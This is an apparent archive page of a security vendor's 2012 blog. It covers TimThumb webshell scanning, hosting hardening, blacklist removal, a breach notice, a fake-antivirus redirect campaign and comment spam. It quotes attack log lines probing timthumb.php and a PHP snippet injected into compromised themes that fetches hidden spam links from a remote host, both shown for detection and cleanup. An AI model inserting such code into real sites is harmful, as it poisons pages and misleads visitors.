Archives for May 2012

List of Domains Hosting Webshells for Timthumb Attacks

We have been tracking TimThumb related attacks for a while and they are still at full force (yes, some people are still using the outdated versions and getting compromised).

Just for the month of May, we identified more than 400 domains hosting backdoors for those type of attacks and a botnet with more than 1,000 IP addresses scanning sites that might be vulnerable to it.

If you like to look at your logs, that’s how it would look like: – – [31/May/2012:03:55:35 +0000] “GET /wp-content/themes/vibrantcms/thumb.php?src= HTTP/1.1” 404 9347 “-” “”

or – – [31/May/2012:03:45:50 +0000] “GET //wp-content/themes/Quadro/timthumb.php?src= HTTP/1.1” 404 305 “-” “”

Basically searching for hundreds of themes per site that could have the old timthumb.php enabled and attempting to insert the backdoors from and on it.

The full list of domains hosting the backdoor is on our labs post:

List of domains hosting webshells for Timthumb attacks

and the list of IP addresses there too:

List of IP addresses scanning for vulnerable timthumb .

Sucuri is Hiring: Senior Security Support Analyst

Its that time again, we’re actively looking for a Senior Security Support Analyst to join the family. If you are passionate about web-based malware, we want to hear from you. Details can be found here

How To: Enhance User Security with Dreamhost

If you are using DreamHost, we recommend a few options to increase the security of your sites in their environment:

    1. Enhanced User Security

It adds a few security restrictions per site/accounts to minimize the chances of attacks from other users in the same shared server.

    1. Configure a different user account per site

There is also an option to create/isolate each site on different user accounts. We highly recommend it to minimize cross site reinfections.

Website Cross-site Contamination?

Learn more about the threats with cross-contamination by reading some of our recent posts: A Little Tale About Website Cross-Contamination and Website Cross-contamination: Blackhat SEO Spam Malware

How To… Submit Infected Site for Review with Bing Blacklisting Authority

Many are not aware that there are many different blacklisting authorities out there, some are more prevalent than others, but each have their own method of submitting for review. In this post I want to focus on Bing as a blacklisting authority specifically.

Like all the other Blacklisting authorities, Bing uses its own proprietary method for crawling your site and identifying what is and isn’t a potential security issue. We can’t talk to their accuracy, but if you use Internet Explorer or Bing as a search engine and you get a big red screen warning you of issues, then these are likely the guys to start with. We should also note, however, blacklist removal is included in our clean up process and we would handle the following submission.

Read More

WHMCS Website Hacked and Database Leaked

The WHMCS website and twitter accounts got compromised yesterday, and their full database (and files) were posted online.

WHMCS Twitter Hacked

Yes, it means that if you have an account there, or if you use any of the WHMCS products, you have to change all your passwords asap, and wait from a confirmation from them before downloading anything from their web site again (since it might still be compromised or with backdoors).

They posted the following on their blog:

Read More

The Sucuri Learn Blog

We have long known that the time was approaching in which we would need to improve our level of engagement with the community and start providing more substantial contributions around managing and securing your websites. We hope to use this blog, Learn Blog, to focus specifically on this challenge, educating our audience, such that through awareness we can improve security postures.

The idea is that our existing blog at will revert back to its core focus of Research and Development (R&D) and other blogs will be created to focus on specific audiences.

The evolving nature of the web ecosystem has it such that its not longer about hiring a webmaster to help manage and administer your website. No, instead technologies like WordPress, Joomla, osCommerce and many others have empowered users to the point where the idea of a webmaster rarely surfaces when discussing the idea of a website. This fact is how the concept of a “Learn” blog came about.

Its about clearly articulating the basics and helping improve the knowledge across the end-user spectrum such that we can work together to combat the growing web-malware problem.

What we hope is to build a repository of knowledge that everyone can benefit from one post at a time.

If you want to know how to do something send us a note at, if we find it useful to the masses we’ll draft up a post and share it with the world.

Websites Compromised with Fake AV Campaign (Windows Web Secure Kit)

“To help protect your computer, Windows Web Secure Kit have detected trojans and is ready to remove them”. We are seeing many WordPress sites compromised with a malware redirecting users to the “Windows Web Secure Kit” fake/rogue anti virus. So if you get that message when visiting your (or any site), you know that it is likely compromised by it.

What is going on?

Once a site gets compromised, the .htaccess file gets modified to redirect users running Windows and coming from search engines to some russian sites: OR OR OR many others

Which then redirects the user to some intermediate sites (also .ru):

Read More

Official WordPress Plugin Directory – Forcing Plugin Updates

For some while we have wondered what happens when a plugin is removed from the official WordPress plugin directory for security reasons. Historically, we haven’t seen much of anything happen – no notification to users, no official blog post, nothing beyond the plugin disappearing from the repo. Sometimes when it did disappear, my understanding is updates were forced – certainly for the major vulnerabilities.

In an interesting move, it looks like some experimental changes have been made to help ensure users quickly learn there is a security problem.

Read More

Blog Comments – Analysing 100,000 Comments and Spammers

“Nice blog, thanks for the info”

“Awesome site. Great job”

“You should take part in a contest for one of the best blogs on the web. I will recommend this site!”

I know you like flattering comments on your website. And I know you love to see many comments on each one of your posts (say you community participation). Who doesn’t, right? We love them too.

So we decided to take a closer look at the last 100,000 (well, 98,238 to be more exact) comments that were sent to the network of sites that we are monitoring. How much of them are spam? Who are the most annoying spammers? And things like that.

Read More

Wpstats. org Spam and a Fake Advanced Search Plugin

If you are seeing hidden links in your WordPress site, it could be coming from On some blackhat spam cases we are analysing, the following code was added to the theme header of the compromised site:

if(function_exists(‘curl_init’)) { $url = ""; $ch = curl_init(); $timeout = 5; curl_setopt($ch,CURLOPT_URL,$url); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout); $data = curl_exec($ch); curl_close($ch); echo "$data”; }

If you are not familiar with PHP, this code will contact, which will return a long list of hidden links to be included on your site (not visible on a normal browser).

Read More